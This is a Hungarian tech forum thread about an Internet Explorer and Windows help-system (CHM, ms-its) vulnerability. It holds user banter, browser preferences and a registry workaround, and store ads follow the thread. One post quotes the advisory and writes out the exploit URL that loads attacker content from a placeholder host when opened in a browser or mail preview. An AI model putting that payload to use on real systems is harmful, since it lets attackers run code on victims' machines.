Aktív témák
-
Adi
senior tag
Én csak a kedves névtelen fikázó-könyvtárlátogató felebarátomat hiányolom ilyenkor, hogy miért nem követeli üvöltve, hogy nehogy MSIE-t rakjunk föl elérhetően a munkahelyemen a gépeken. :DDD
-
maszat
senior tag
Minő meglepő. Elég unalmas, hogy mindig van vmilyen hiba benne
[Szerkesztve] -
-
Gregorius
őstag
Érdekes. Leírtak alapján ez egy tipikus cross-domain scripting hiba, akkor meg nem lehet tetszőleges kódot futtatni. Persze kivéve, ha az a bizonyos kód ki tud jönni a sandboxból, de az meg egy másik hiba.
-
-
F-ECTS szerintem a Thunderbirdre (kijott mar az egyaltalan?) gondolt, Pine helyett - ami mondjuk jelen szituacioban gazos lenne, mert ugy nez ki, hogy azt is erinti a sechole, ha Windowson fut.
Egyebkent nalam is Pine (+fetchmail, minidg jo erzes az, hogy ha lehal az imap szerver, akkor is el tudom erni a regi leveleimet, meg lehet bennuk greppelni :) ) van, meg eleg gyakran Lynx - teljesen jok azok :)
[Szerkesztve] -
faster
nagyúr
válasz
csabika25 #27 üzenetére
in exploit.html will be executed in the security context of the Local Machine Zone. It is common practice for exploit.html to either contain or download an executable payload such as a backdoor, trojan horse, virus, bot, or other malicious code.
Én úgy értelmezem, hogy az eltérítés egy másik hacked.chm fájlra megtörténik ugyan, de a kód betöltése, futtatása (és minden fájlművelet) mindig is a viruskereső beépülő modulján keresztül zajlik. Mint ahogy megfog egy vírust akkor is, ha floppyn kettőt kattintok a fertőzött exe-re. -
csabika25
aktív tag
Az a furcsa, hogy a bejelentés szerint már 2001. november óta ismert a hiba, csak most tették közzé. Valszeg nem triviális a megoldása. És Microsofték nem is tették még közzé ezt a hibát. Azt javasolják, hogy a HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-itss,its,mk} bejegyzést töröljük vagy nevezzük át a Registryben. Ez viszont nagyban befolyásolja a Help rendszer működését. Kíváncsian várom, mi lesz a vége...
-
WN31RD
addikt
válasz
Mostly Harmless #6 üzenetére
Ha a Windowst nem használnád, akkor nem vonatkozna ez rád. :P
-
válasz
Mostly Harmless #6 üzenetére
De.
-
Az a baj, hogy nem is igazan kell klikkelniuk, Outlook preview ablakban is mukodik a dolog, az alert szerint elegendo a kovetkezot betenni egy html oldalba/html levelbe, es amikor azt megnezi a t. aldozat, maris lehet 0wnolni a gepet:
ms-its:mhtml:file://C: osuchfile_mht!http://www.example.com//exploit_chm::exploit_html -
Polesz
addikt
Na ha mégis a súgó rendszert érinti akkor miért IE hiba? Szerintem inkább ''Újabb súlyos sebezhetőség a Windowsban'' lett volna a helyes cím. Amúgy nem szeretem az ilyen híreket. Se a súlyos felhasználókat akik minden sz@rra kattingatnak :)
-
Mostly Harmless
tag
én nem használok helpet, akkor ez rám nem vonatkozik? =}
-
Attyo
tag
Miért van az, hogy nem lepődtem meg a hírt olvasva??? :C
-
Három hónap firebird / firefox után is felmegy a pumpa ilyenkor... :(
-
Tulajdonkeppen ki volt az a marha, aki kitalalta az ActiveX controllokat? Ott helyben le kellett volna loni, nem pedig implementalni ezt a vackot... :-
Aktív témák
- Windows, Office licencek kedvező áron, egyenesen a Microsoft-tól - Automata kézbesítés utalással is!
- Vírusirtó, Antivirus, VPN kulcsok
- Jogtiszta Windows - Office & Vírusirtó licencek- Azonnal - Számlával - Garanciával - Nint.hu
- Adobe Előfizetések - Adobe Creative Cloud All Apps - 12 Hónap
- Windows 10 11 Pro Office 19 21 Pro Plus Retail kulcs 1 PC Mac AKCIÓ! Automatikus 0-24
- LG K61 128GB, Kártyafüggetlen, 1 Év Garanciával
- Honor Magic5 Lite 128GB, Kártyafüggetlen, 1 Év Garanciával
- LG 27UN83A-W - IPS LED - 3840x2160 4K - 60Hz 5ms - USB Type-C - HDR 400 - AMD FreeSync - Hangszórók
- BESZÁMÍTÁS! ASROCK B550 R5 3600 16GB DDR4 250GB SSD 1TB HDD RX 5700 XT 8GB CM MasterBox MB500 700W
- Logitech G513 Carbon Tactile DE (3)
Állásajánlatok
Cég: FOTC
Város: Budapest